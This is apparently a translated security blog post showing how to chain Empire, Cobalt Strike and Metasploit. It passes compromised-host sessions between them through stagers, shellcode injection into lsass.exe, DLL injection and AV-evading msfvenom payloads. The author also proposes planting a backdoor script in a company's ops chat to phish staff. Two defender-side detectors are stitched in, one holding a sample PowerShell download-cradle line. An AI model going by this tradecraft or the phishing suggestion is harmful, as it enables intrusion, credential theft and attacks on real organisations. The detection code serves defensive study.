The Three Intranet Swordsmen Swear Brotherhood - 5ecurity Technical Team


The Three Intranet Swordsmen

  • Empire, Cobalt Strike and Metasploit are known as the "three swordsmen of APT"; these three tools are favored by many hacker teams and APT groups at home and abroad.
  • Metasploit: this one needs no introduction. It is a platform that combines information gathering, pre-exploitation, exploitation, post-exploitation, trojans and social engineering in one place; the must-have tool for home, travel and plunder.
  • Cobalt Strike: similar to a RAT, a powerful APT collaboration platform. It is highly extensible, works across platforms, is a standalone framework that does not depend on any other framework, and provides a rich set of third-party interfaces; it can do intranet penetration, social-engineering phishing, trojan remote control and whatever else you need. Although it is commercial software, everyone seems able to crack it easily; in practice the cracked builds contain plenty of hidden backdoors, so users should analyze them for themselves.
  • Empire: a sharp tool for intranet penetration. It is cross-platform, offers functionality similar to Metasploit with a rich set of modules and interfaces, lets you add your own modules and features, and is the best platform for PowerShell-based tradecraft, bar none.
  • During penetration tests we run into all kinds of environments, and in many cases I need these three tools to work together. Today I will share how to chain these three tools so they can be used flexibly.

Linking Empire to Metasploit

We start by generating a simple trojan with Empire.
Empire's framework is modeled on Metasploit, so usage is much the same.
First list all the listener modules:

dbx
http
http_com
http_foreign
http_hop
http_mapi
meterpreter
onedrive
redirector


Here I use http. A listener needs a name, a host and a port; set those, start the listener, and that is it.
Next we generate a payload. The usestager command shows that there are many stager modules to choose from:

multi/bash
osx/ducky
osx/safari_launcher
windows/hta
windows/macroless_msword
multi/launcher
osx/dylib
osx/teensy
windows/launcher_bat
windows/shellcode
multi/macro
osx/jar
windows/backdoorLnkMacro
windows/launcher_lnk
windows/teensy
multi/pyinstaller
osx/launcher
windows/bunny
windows/launcher_sct
multi/war
osx/macho
windows/csharp_exe
windows/launcher_vbs
osx/applescript
osx/macro
windows/dll
windows/launcher_xml
osx/application
osx/pkg
windows/ducky
windows/macro

Choose the module you want to generate and associate it with your listener.
Here I generate a shortcut (.lnk) trojan; it is written to the Empire root directory, while some other payloads are written to the tmp/ directory.

Upload the generated file to the target host and run it.

Once it runs, the listener receives a check-in notification.

The agents command lists the hosts that are online.

Once the host has checked in, our goal is to convert it into a meterpreter session.
Run interact followed by the agent ID to enter the interactive session.
With usemodule we can see the available post-exploitation modules; the selection is very rich, and this is exactly where Empire shines.

code_execution/invoke_dllinjection
persistence/elevated/wmi*
code_execution/invoke_metasploitpayload
persistence/elevated/wmi_updater*
code_execution/invoke_ntsd
persistence/misc/add_netuser
code_execution/invoke_reflectivepeinjection
persistence/misc/add_sid_history*
code_execution/invoke_shellcode
persistence/misc/debugger*
code_execution/invoke_shellcodemsil
persistence/misc/disable_machine_acct_change*
collection/ChromeDump
persistence/misc/get_ssps
collection/FoxDump
persistence/misc/install_ssp*
collection/USBKeylogger*
persistence/misc/memssp*
collection/WebcamRecorder
persistence/misc/skeleton_key*
collection/browser_data
persistence/powerbreach/deaduser
collection/clipboard_monitor
persistence/powerbreach/eventlog*
collection/file_finder
persistence/powerbreach/resolver
collection/find_interesting_file
persistence/userland/backdoor_lnk
collection/get_indexed_item
persistence/userland/registry
collection/get_sql_column_sample_data
persistence/userland/schtasks
collection/get_sql_query
privesc/ask
collection/inveigh
privesc/bypassuac
collection/keylogger
privesc/bypassuac_env
collection/minidump
privesc/bypassuac_eventvwr
collection/netripper
privesc/bypassuac_fodhelper
collection/ninjacopy*
privesc/bypassuac_sdctlbypass
collection/packet_capture*
privesc/bypassuac_tokenmanipulation
collection/prompt
privesc/bypassuac_wscript
collection/screenshot
privesc/getsystem*
collection/vaults/add_keepass_config_trigger
privesc/gpp
collection/vaults/find_keepass_config
privesc/mcafee_sitelist
collection/vaults/get_keepass_config_trigger
privesc/ms16-032
collection/vaults/keethief
privesc/ms16-135
collection/vaults/remove_keepass_config_trigger
privesc/powerup/allchecks
credentials/credential_injection*
privesc/powerup/find_dllhijack
credentials/enum_cred_store
privesc/powerup/service_exe_restore
credentials/invoke_kerberoast
privesc/powerup/service_exe_stager
credentials/mimikatz/cache*
privesc/powerup/service_exe_useradd
credentials/mimikatz/certs*
privesc/powerup/service_stager
credentials/mimikatz/command*
privesc/powerup/service_useradd
credentials/mimikatz/dcsync
privesc/powerup/write_dllhijacker
credentials/mimikatz/dcsync_hashdump
privesc/tater
credentials/mimikatz/extract_tickets
recon/find_fruit
credentials/mimikatz/golden_ticket
recon/get_sql_server_login_default_pw
credentials/mimikatz/keys*
recon/http_login
credentials/mimikatz/logonpasswords*
situational_awareness/host/antivirusproduct
credentials/mimikatz/lsadump*
situational_awareness/host/computerdetails*
credentials/mimikatz/mimitokens*
situational_awareness/host/dnsserver
credentials/mimikatz/pth*
situational_awareness/host/findtrusteddocuments
credentials/mimikatz/purge
situational_awareness/host/get_pathacl
credentials/mimikatz/sam*
situational_awareness/host/get_proxy
credentials/mimikatz/silver_ticket
situational_awareness/host/get_uaclevel
credentials/mimikatz/trust_keys*
situational_awareness/host/monitortcpconnections
credentials/powerdump*
situational_awareness/host/paranoia*
credentials/sessiongopher
situational_awareness/host/winenum
credentials/tokens
situational_awareness/network/arpscan
credentials/vault_credential*
situational_awareness/network/bloodhound
exfiltration/egresscheck
situational_awareness/network/get_exploitable_system
exfiltration/exfil_dropbox
situational_awareness/network/get_spn
exploitation/exploit_eternalblue
situational_awareness/network/get_sql_instance_domain
exploitation/exploit_jboss
situational_awareness/network/get_sql_server_info
exploitation/exploit_jenkins
situational_awareness/network/portscan
lateral_movement/inveigh_relay
situational_awareness/network/powerview/find_foreign_group
lateral_movement/invoke_dcom
situational_awareness/network/powerview/find_foreign_user
lateral_movement/invoke_executemsbuild
situational_awareness/network/powerview/find_gpo_computer_admin
lateral_movement/invoke_psexec
situational_awareness/network/powerview/find_gpo_location
lateral_movement/invoke_psremoting
situational_awareness/network/powerview/find_localadmin_access
lateral_movement/invoke_smbexec
situational_awareness/network/powerview/find_managed_security_group
lateral_movement/invoke_sqloscmd
situational_awareness/network/powerview/get_cached_rdpconnection
lateral_movement/invoke_sshcommand
situational_awareness/network/powerview/get_computer
lateral_movement/invoke_wmi
situational_awareness/network/powerview/get_dfs_share
lateral_movement/invoke_wmi_debugger
situational_awareness/network/powerview/get_domain_controller
lateral_movement/jenkins_script_console
situational_awareness/network/powerview/get_domain_policy
lateral_movement/new_gpo_immediate_task
situational_awareness/network/powerview/get_domain_trust
management/disable_rdp*
situational_awareness/network/powerview/get_fileserver
management/downgrade_account
situational_awareness/network/powerview/get_forest
management/enable_multi_rdp*
situational_awareness/network/powerview/get_forest_domain
management/enable_rdp*
situational_awareness/network/powerview/get_gpo
management/get_domain_sid
situational_awareness/network/powerview/get_group
management/honeyhash*
situational_awareness/network/powerview/get_group_member
management/invoke_script
situational_awareness/network/powerview/get_localgroup
management/lock
situational_awareness/network/powerview/get_loggedon
management/logoff
situational_awareness/network/powerview/get_object_acl
management/mailraider/disable_security
situational_awareness/network/powerview/get_ou
management/mailraider/get_emailitems
situational_awareness/network/powerview/get_rdp_session
management/mailraider/get_subfolders
situational_awareness/network/powerview/get_session
management/mailraider/mail_search
situational_awareness/network/powerview/get_site
management/mailraider/search_gal
situational_awareness/network/powerview/get_subnet
management/mailraider/send_mail
situational_awareness/network/powerview/get_user
management/mailraider/view_email
situational_awareness/network/powerview/map_domain_trust
management/psinject
situational_awareness/network/powerview/process_hunter
management/reflective_inject
situational_awareness/network/powerview/set_ad_object
management/restart
situational_awareness/network/powerview/share_finder
management/runas
situational_awareness/network/powerview/user_hunter
management/shinject
situational_awareness/network/reverse_dns
management/sid_to_user
situational_awareness/network/smbautobrute
management/spawn
situational_awareness/network/smbscanner
management/spawnas
trollsploit/get_schwifty
management/switch_listener
trollsploit/message
management/timestomp
trollsploit/process_killer
management/user_to_sid
trollsploit/rick_ascii
management/vnc
trollsploit/rick_astley
management/wdigest_downgrade*
trollsploit/thunderstruck
management/zipfolder
trollsploit/voicetroll
persistence/elevated/registry*
trollsploit/wallpaper
persistence/elevated/schtasks*
trollsploit/wlmdr

The info command shows the host's details.

Here we use Empire's built-in

code_execution/invoke_metasploitpayload

module, which interacts with Metasploit's web_delivery.
So first, on the Metasploit side that will receive the session, set up an

exploit/multi/script/web_delivery

listener.

After running Execute, Metasploit receives the new-session notification.

The method above is also essentially a PowerShell-based check-in.
Many other modules can be used as well, for example

code_execution/invoke_shellcode

Once the listener is set up on the msf side, Empire can execute the module.

To remove a host session, use the kill command followed by the agent ID.
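Every hand-off in this section arrives on the endpoint the same way: a PowerShell process that starts with a hidden window, decodes or downloads a command, and then fetches more code over HTTP. The script below is an added, defender-side example (it is not code from the original post, from Empire or from Metasploit): it scores Sysmon-style process-creation events by the weak indicators that such launches combine, and only alerts when several occur together. The events are constructed inline with Sysmon Event ID 1 field names; the paths, the placeholder host and the command lines are assumptions, not captured telemetry.

```python
"""Flag PowerShell-based stager launches in Sysmon-style process-creation events.

Added defender-side example; not code from the original post, Empire or
Metasploit. The event records below are constructed and only mimic Sysmon
Event ID 1 field names; paths and command lines are assumptions.
"""
import re
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # benign scheduled admin script
        "EventID": "1",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1",
    },
    {  # hidden window plus encoded command, spawned from a shortcut via cmd.exe
        "EventID": "1",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -Enc BASE64_PLACEHOLDER",
    },
    {  # download cradle: fetch a remote script over HTTP and evaluate it
        "EventID": "1",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
                       ".DownloadString('http://EXAMPLE_HOST:8080/'))",
    },
    {  # not PowerShell: ignored by the rule
        "EventID": "1",
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]

# (name, pattern, weight): each indicator is weak alone; the sum is what we alert on.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+\S+", re.I), 3),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 3),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("bypass_policy", re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
]
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")
# Parents typical of document, shortcut or script-host launches rather than interactive admin use.
SCRIPT_HOST_PARENTS = ("cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe")


def score_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Score one process-creation event; None if it is not a PowerShell launch."""
    if event.get("EventID") != "1":
        return None
    if not event.get("Image", "").lower().endswith(POWERSHELL_IMAGES):
        return None
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    if event.get("ParentImage", "").lower().endswith(SCRIPT_HOST_PARENTS):
        hits.append("script_host_parent")
        score += 1
    return {"score": score, "indicators": hits, "command": cmd}


def find_suspicious(events: List[Dict[str, str]], threshold: int = 4) -> List[Dict[str, object]]:
    """Return the events whose combined indicator score reaches the threshold."""
    findings = []
    for index, event in enumerate(events):
        result = score_event(event)
        if result is not None and result["score"] >= threshold:
            findings.append({"index": index, **result})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_EVENTS):
        print(f"[{finding['score']}] event {finding['index']}: {', '.join(finding['indicators'])}")
```

The scoring keeps a lone -ExecutionPolicy Bypass from a scheduled script below the threshold, while a hidden window combined with an encoded command or a download cradle, launched from a script host, crosses it. In a real pipeline the same function would run over the parsed Sysmon channel instead of the constructed list, and the weights would be tuned against the environment's own baseline of PowerShell use.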

Linking Empire to Cobalt Strike

When we have an Empire session and want to link it to Cobalt Strike so the team can share it and extend the results, first create a listener in Cobalt Strike.

List online hosts: agents
Enter the Empire session: interact followed by the host NAME

View host information: info
After obtaining access we can use Empire's post-exploitation modules. I usually use the

code_execution/invoke_shellcode

module, which injects directly into a process. It is relatively simple to use.
Enter the module:

usemodule code_execution/invoke_shellcode

Only three parameters need to be set: the Cobalt Strike listener host, its port, and the module. Then run Execute.
Cobalt Strike immediately receives the check-in notification.
There are many similar modules; I will not go through them one by one.

Linking Cobalt Strike to Empire

When a teammate shares a Cobalt Strike target with us and we want to use Empire's rich post-exploitation modules to go deeper, how do we link it to Empire?

First create a listener and a payload in Empire.
This time we generate a .bin file for shellcode injection.

After the payload is assigned its listener, a launcher.bin file appears in the tmp directory.
Download launcher.bin to the local machine, then gather process information from the host.

After entering the session, use the ps command to view process information.
Here I choose the lsass.exe process, PID 596, as the injection target.
Enter: shinject, followed by the target process ID and the system architecture.
It prompts you to select the shellcode file to inject; once selected, the file is uploaded and injected automatically.
After a short wait, Empire receives the check-in notification.

Linking Cobalt Strike to Metasploit

When a teammate shares Cobalt Strike access with me and we want to move to msf to go deeper, we can use Cobalt Strike's spawn feature.
Cobalt Strike's foreign listeners can interoperate with MSF:

windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp

Here I use reverse_tcp.
Start a reverse_tcp listener in msf.
Then click spawn on the session host in Cobalt Strike.

After choosing spawn, create a foreign listener:

windows/foreign/reverse_tcp

After a short wait, msf receives the session request.

From here we can use MSF for further in-depth penetration.

Linking Metasploit to Empire

If you want to promote a meterpreter session into an Empire session, it is best to hold SYSTEM privileges, so run getsystem beforehand; if your privileges are too low, many functions will fail and even the check-in itself may fail.
Our approach is to generate a payload with usestager and have meterpreter load and run it.
We use msfvenom to generate a lightly encoded trojan.
First generate a simple payload.

Upload it to the target host and run it.

Next, link this session to Empire.
First create a listener in Empire: set the listener name, the listener host and the listener port.

I usually link to Empire by injecting a DLL into a process, so next we create the payload with windows/dll.

The DLL file is generated in the tmp directory.
Next we need a process ID to inject into.

Once everything is in place, we use

post/windows/manage/reflective_dll_inject

to inject the DLL file.

At this point Empire already has the new agent checked in.

Linking Metasploit to Cobalt Strike

Target machine: Windows 7
Attacker machine: Kali
First we use msfvenom to generate a Python backdoor, which has a lower chance of being flagged by AV.

We copy the payload code into an SSH batch script to simulate a phishing attack.

After saving it we run a check: the Python module is not flagged, but its privileges are low, so privilege escalation would be needed afterwards.

With 360 running, there was no alert at any point from execution through check-in.

If we dropped this into some company's ops group chat or an ops forum, the moment someone ran it would be like tearing open the company's front door; this is only meant to spark ideas, so use your imagination.
Next we convert it into a Cobalt Strike session.
After backgrounding the session, we can use the MSF

windows/manage/payload_inject

module to inject a new process for Cobalt Strike.

First start a listener in Cobalt Strike:

Windows/beacon_http/reverse_http

After a short wait, the check-in notification arrives.
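Three of the hand-offs in this article work by putting code into another process: shinject into lsass.exe in the Cobalt Strike to Empire section, post/windows/manage/reflective_dll_inject in the Metasploit to Empire section, and windows/manage/payload_inject here. Whatever the framework, the host sees the same two things: one process opening another with write and thread-creation rights, and a thread being created in a process that did not create it. The detector below is an added, defender-side example, not code from the original post or from any of the three tools. It works on constructed events with Sysmon-like field names for ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8); the images, PIDs, access masks and allowlist are assumptions (the lsass.exe PID 596 simply echoes the post's own example).

```python
"""Flag cross-process injection in Sysmon-style ProcessAccess (10) and
CreateRemoteThread (8) events.

Added defender-side example; not code from the original post, Empire,
Cobalt Strike or Metasploit. The events are constructed with Sysmon-like
field names; images, PIDs and access masks are assumptions (PID 596 for
lsass.exe echoes the post's own example).
"""
from typing import Dict, List, Optional

# Win32 process access rights (documented constants) that an injector needs.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Processes where write/thread access from an unexpected source is always critical.
PROTECTED_TARGETS = ("lsass.exe", "winlogon.exe", "csrss.exe", "services.exe")
# Known-good openers of lsass on a typical host; tune per environment (assumption).
ALLOWLISTED_SOURCES = (
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\services.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},  # query only
    {"EventID": "10", "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},  # full access
    {"EventID": "8", "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "SourceProcessId": "4120", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "TargetProcessId": "596"},  # thread created inside lsass
    {"EventID": "8", "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "SourceProcessId": "3312", "TargetImage": r"C:\Windows\System32\notepad.exe",
     "TargetProcessId": "5004"},  # thread created in a freshly spawned host process
    {"EventID": "8", "SourceImage": r"C:\Program Files\Example\svc.exe",
     "SourceProcessId": "900", "TargetImage": r"C:\Program Files\Example\svc.exe",
     "TargetProcessId": "900"},  # thread in its own process: normal
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # limited query
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for one event, or None when it looks benign."""
    eid = event.get("EventID")
    src = event.get("SourceImage", "")
    tgt = event.get("TargetImage", "")
    if eid == "8":
        # A thread created in the creator's own process is ordinary behaviour.
        if event.get("SourceProcessId") == event.get("TargetProcessId"):
            return None
        severity = "critical" if basename(tgt) in PROTECTED_TARGETS else "high"
        return {"rule": "remote_thread", "severity": severity, "source": src, "target": tgt}
    if eid == "10":
        if basename(tgt) not in PROTECTED_TARGETS:
            return None
        access = int(event.get("GrantedAccess", "0x0"), 16)
        if access & INJECT_MASK == 0:
            return None  # read/query-only handles to lsass are noisy and expected
        if src.lower() in ALLOWLISTED_SOURCES:
            return None
        return {"rule": "protected_process_access", "severity": "critical",
                "source": src, "target": tgt, "access": hex(access)}
    return None


def find_injection(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify over an event stream and keep each finding with its index."""
    findings = []
    for index, event in enumerate(events):
        result = classify(event)
        if result is not None:
            findings.append({"index": index, **result})
    return findings


if __name__ == "__main__":
    for f in find_injection(SAMPLE_EVENTS):
        print(f"{f['severity']:8} {f['rule']}: {f['source']} -> {f['target']}")
```

The access-mask check is what keeps Event ID 10 usable: dozens of legitimate processes open lsass with query-only rights, but very few need PROCESS_VM_WRITE or PROCESS_CREATE_THREAD on it, and those that do belong on a short, reviewed allowlist. Event ID 8 is rarer and is worth alerting on even when the target is an ordinary program such as notepad.exe, because a fresh "host" process receiving a remote thread is exactly what a spawn-and-inject hand-off looks like.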

Summary

Having read this far, are you interested in these three tools? Many of the techniques in this article are not necessarily the best or the only way; they are just meant to get the discussion started. This article certainly has many shortcomings, so for now treat it as an introductory piece for beginners. Anyone interested in APT is welcome to get in touch and exchange ideas.

Reproduction without permission is prohibited: 5ecurity Technical Team » The Three Intranet Swordsmen Swear Brotherhood
